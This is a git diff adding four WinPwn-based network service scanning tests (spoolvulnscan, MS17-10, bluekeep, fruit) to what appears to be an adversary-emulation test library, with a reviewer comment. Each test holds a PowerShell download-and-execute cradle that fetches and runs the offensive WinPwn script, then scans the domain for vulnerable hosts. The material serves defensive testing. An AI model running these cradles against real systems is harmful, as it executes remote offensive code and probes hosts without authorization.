diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 579aac8b..3a31b727 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -910,6 +910,10 @@ discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 492c0c9e..21570647 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -634,6 +634,10 @@ discovery,T1069.001,Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-
discovery,T1069.001,Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d5f7943c..0bd00f6f 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1434,6 +1434,10 @@
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
+ - Atomic Test #5: WinPwn - spoolvulnscan [windows]
+ - Atomic Test #6: WinPwn - MS17-10 [windows]
+ - Atomic Test #7: WinPwn - bluekeep [windows]
+ - Atomic Test #8: WinPwn - fruit [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- Atomic Test #2: Network Share Discovery - linux [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6f4a872b..6d0b5c4d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1035,6 +1035,10 @@
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
+ - Atomic Test #5: WinPwn - spoolvulnscan [windows]
+ - Atomic Test #6: WinPwn - MS17-10 [windows]
+ - Atomic Test #7: WinPwn - bluekeep [windows]
+ - Atomic Test #8: WinPwn - fruit [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 0620591a..ea2da349 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -60280,6 +60280,55 @@ discovery:
'
name: powershell
+ - name: WinPwn - spoolvulnscan
+ auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
+ description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of
+ WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ spoolvulnscan -noninteractive -consoleoutput
+ name: powershell
+ - name: WinPwn - MS17-10
+ auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
+ description: Search for MS17-10 vulnerable Windows Servers in the domain using
+ powerSQL function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ MS17-10 -noninteractive -consoleoutput
+ name: powershell
+ - name: WinPwn - bluekeep
+ auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+ description: Search for bluekeep vulnerable Windows Systems in the domain using
+ bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds
+ in testing on a small domain).
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ bluekeep -noninteractive -consoleoutput
+ name: powershell
+ - name: WinPwn - fruit
+ auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
+ description: Search for potentially vulnerable web apps (low hanging fruits)
+ using fruit function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ fruit -noninteractive -consoleoutput
+ name: powershell
T1135:
technique:
object_marking_refs:
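Review bot: The description of the `WinPwn - MS17-10` test says it uses the "powerSQL function of WinPwn", but its executor command runs `MS17-10 -noninteractive -consoleoutput`; this looks like a copy-paste leftover and should read `using MS17-10 function of WinPwn`. The same sentence is repeated in the T1046.md hunk under "Atomic Test #6", so the fix belongs in the technique's source YAML (not shown in this diff), from which these files are presumably generated. The MS17-10 and bluekeep descriptions say the scan runs "in the domain", yet neither test has input arguments or a scope note, so each description should state that the test probes hosts other than the one it runs on and must stay inside the authorized test range. The `downloadstring` URL is pinned to a commit, but `$S3cur3Th1sSh1t_repo` is set to the account root with no commit, so anything WinPwn fetches through that variable is presumably unpinned; that is worth confirming and documenting.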
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 9c8ec794..f940110e 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -14,6 +14,14 @@ Within cloud environments, adversaries may attempt to discover services running
- [Atomic Test #4 - Port Scan using python](#atomic-test-4---port-scan-using-python)
+- [Atomic Test #5 - WinPwn - spoolvulnscan](#atomic-test-5---winpwn---spoolvulnscan)
+
+- [Atomic Test #6 - WinPwn - MS17-10](#atomic-test-6---winpwn---ms17-10)
+
+- [Atomic Test #7 - WinPwn - bluekeep](#atomic-test-7---winpwn---bluekeep)
+
+- [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)
+
@@ -209,4 +217,124 @@ echo "Python 3 must be installed manually"
+
+
+
+## Atomic Test #5 - WinPwn - spoolvulnscan
+Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 54574908-f1de-4356-9021-8053dd57439a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+spoolvulnscan -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #6 - WinPwn - MS17-10
+Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97585b04-5be2-40e9-8c31-82157b8af2d6
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+MS17-10 -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #7 - WinPwn - bluekeep
+Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+bluekeep -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #8 - WinPwn - fruit
+Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bb037826-cbe8-4a41-93ea-b94059d6bb98
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+fruit -noninteractive -consoleoutput
+```
+
+
+
+
+
+